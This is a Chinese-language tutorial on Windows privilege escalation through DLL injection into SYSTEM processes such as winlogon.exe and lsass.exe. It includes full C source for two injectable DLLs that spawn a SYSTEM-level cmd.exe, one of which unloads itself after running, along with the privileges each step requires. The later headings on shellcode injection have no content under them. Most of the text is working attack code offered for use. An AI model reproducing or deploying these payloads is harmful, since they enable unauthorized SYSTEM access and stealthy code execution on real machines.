[toc]
利用系统进程来创建新的进程
lsass.exe 进程中若没有加载 kernel32.dll（只有 ntdll.dll），就需要先把 kernel32.dll 注入到 lsass.exe 进程中。注：请先用目标进程的模块列表确认这一点；基于远程线程调用 LoadLibraryW 的注入方式本身就依赖目标进程已经映射了 kernel32.dll。
1. 使用 CreateProcessWithTokenW 借用其他进程的令牌来创建新的进程（调用方自身需要持有 SeImpersonatePrivilege）
之前的文章写过: 6.使用C语言在windows中创建线程与进程并且创建具有system权限进程
C:\Windows\System32\kernel32.dll
2. 将Dll注入到系统进程中弹出cmd程序
编写 x86_64（64 位）DLL 并编译。DLL 的位数必须与目标进程一致：64 位的 winlogon.exe 只能加载 64 位 DLL。
将 DLL 注入到拥有 SYSTEM 权限的 winlogon.exe 进程中。如果系统中有两个 winlogon.exe（存在多个登录会话时会出现），只注入其中一个可能看不到效果（cmd.exe 大概率是在被注入进程所属的会话/桌面中创建的）。注入器本身需要以管理员身份运行，并在自己的令牌中启用 SeDebugPrivilege 才能打开系统进程；若目标进程受 PPL 保护（例如开启了 LSA 保护的 lsass.exe），即使有 SeDebugPrivilege 也无法打开。
完整代码,功能为创建一个cmd.exe
| #include <Windows.h> #include <tchar.h>
/* Function-pointer type with the exact signature of kernel32!CreateProcessW.
 * Create() resolves the export at run time with GetProcAddress and calls it
 * through this type instead of linking the import statically. */
typedef BOOL(WINAPI* pCreateProcessW)(LPCWSTR lpApplicationName, LPWSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCWSTR lpCurrentDirectory, LPSTARTUPINFOW lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation);
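/*
 * Resolve CreateProcessW from kernel32.dll at run time and spawn cmd.exe
 * inside the host process.
 *
 * The export is looked up with GetProcAddress rather than linked statically,
 * so the DLL carries no import entry for it.  NOTE(review): LoadLibraryW and
 * GetProcAddress are kernel32 exports themselves, so this still depends on
 * kernel32.dll being mapped in the host process.
 *
 * Returns 0 on success and a non-zero code when the library load, the export
 * lookup or the process creation fails.  (The original always returned 0;
 * DllMain ignores the value, so callers are unaffected.)
 */
int Create() {
    HMODULE hDll = LoadLibraryW(L"Kernel32.dll");
    if (hDll == NULL) {
        return 1;
    }

    pCreateProcessW nCreateProcessW = (pCreateProcessW)GetProcAddress(hDll, "CreateProcessW");
    if (nCreateProcessW == NULL) {
        FreeLibrary(hDll);
        return 2;
    }

    STARTUPINFOW si = {0};
    si.cb = sizeof(si);
    si.dwFlags = STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_SHOW;
    PROCESS_INFORMATION pi = {0};

    /* The application name is passed explicitly, so no command line is
     * needed.  The forward-slash path is kept from the original; switch to a
     * backslash path if CreateProcessW fails with ERROR_FILE_NOT_FOUND. */
    int rc = 0;
    if (!nCreateProcessW(L"c://windows//system32//cmd.exe", NULL, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi)) {
        rc = 3;
    } else {
        /* The child keeps running on its own; only our handles to it are
         * released so the host does not leak two kernel objects per call. */
        CloseHandle(pi.hThread);
        CloseHandle(pi.hProcess);
    }

    FreeLibrary(hDll);
    return rc;
}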
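/*
 * Thread entry that performs the real work.  It is kept out of DllMain
 * because Create() calls LoadLibraryW and CreateProcessW, neither of which
 * may be called while the loader lock is held during DllMain (see Microsoft's
 * "Dynamic-Link Library Best Practices").
 */
static DWORD WINAPI CreateProcThread(LPVOID param) {
    (void)param;
    return (DWORD)Create();
}

/*
 * DLL entry point.
 *
 * On DLL_PROCESS_ATTACH the work is handed to a fresh thread and DllMain
 * returns immediately; creating a thread inside DllMain is allowed as long as
 * the entry point does not wait on it.  Thread attach/detach notifications
 * are switched off because nothing here uses them.  Always returns TRUE so
 * the loader keeps the module mapped even if the thread could not be started
 * (the spawn is best-effort, as in the original).  lpReserved is unused.
 */
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    (void)lpReserved;

    switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH: {
        DisableThreadLibraryCalls(hModule);
        HANDLE hThread = CreateThread(NULL, 0, CreateProcThread, NULL, 0, NULL);
        if (hThread != NULL) {
            /* The thread keeps running without the handle; close it now so it
             * is not leaked in the host process. */
            CloseHandle(hThread);
        }
        break;
    }
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
    default:
        break;
    }
    return TRUE;
}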
3. 将Dll注入到系统进程中弹出cmd程序而后卸载自身
| #include <Windows.h> HMODULE g_hDll = NULL; int Create(); DWORD WINAPI UnloadProc(PVOID param);
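/*
 * Worker thread started from DllMain: spawn cmd.exe, then unload this DLL
 * from the host process.
 *
 * Runs on its own thread because CreateProcessW must not be called while the
 * loader lock is held during DllMain.  The unload is done on this same thread
 * *after* Create() has returned: UnloadProc calls FreeLibraryAndExitThread,
 * which never returns, so no code of this module is still executing when the
 * image is unmapped.
 */
static DWORD WINAPI WorkerProc(LPVOID param) {
    Create();
    return UnloadProc(param);  /* does not return */
}

/*
 * DLL entry point.
 *
 * On DLL_PROCESS_ATTACH it records its own module handle in g_hDll (needed by
 * UnloadProc), disables thread notifications, and starts WorkerProc.  The
 * thread handle is closed at once so it is not leaked; DllMain must not wait
 * on the thread.  Always returns TRUE, as in the original, so the injector's
 * LoadLibraryW succeeds even if the worker could not be started.
 * lpReserved is unused.
 */
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    (void)lpReserved;

    switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH: {
        g_hDll = (HMODULE)hModule;
        DisableThreadLibraryCalls(hModule);
        HANDLE hThread = CreateThread(NULL, 0, WorkerProc, NULL, 0, NULL);
        if (hThread != NULL) {
            CloseHandle(hThread);
        }
        break;
    }
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
    default:
        break;
    }
    return TRUE;
}

/*
 * Spawn cmd.exe with a statically linked CreateProcessW.
 *
 * Unlike the first listing this no longer starts the unload thread itself;
 * WorkerProc unloads the module only after this function has returned, which
 * removes the window in which the DLL could be unmapped while a thread is
 * still executing inside it.
 *
 * Returns 0 on success, 1 if CreateProcessW fails.  The child's process and
 * thread handles are closed so the host process does not leak them.
 */
int Create() {
    STARTUPINFOW si = {0};
    si.cb = sizeof(si);
    si.dwFlags = STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_SHOW;
    PROCESS_INFORMATION pi = {0};

    /* Forward-slash path kept from the original; use a backslash path if
     * CreateProcessW fails with ERROR_FILE_NOT_FOUND. */
    if (!CreateProcessW(L"c://windows//system32//cmd.exe", NULL, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi)) {
        return 1;
    }
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
    return 0;
}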
/*
 * Thread routine that unloads this DLL from the host process.
 *
 * FreeLibraryAndExitThread drops the module reference held in g_hDll and
 * terminates the calling thread in one step, so the thread never returns
 * into code that may already have been unmapped.  The trailing return only
 * satisfies the compiler; it is never reached.  param is unused.
 */
DWORD WINAPI UnloadProc(PVOID param) {
    (void)param;
    FreeLibraryAndExitThread(g_hDll, 0);
    /* not reached */
    return 0;
}
4.利用shellcode将system("cmd.exe")转为机器码注入到系统进程中
5.利用shellcode将CreateProcessA()转为机器码注入到系统进程中
6. 将代码注入到 winlogon.exe 中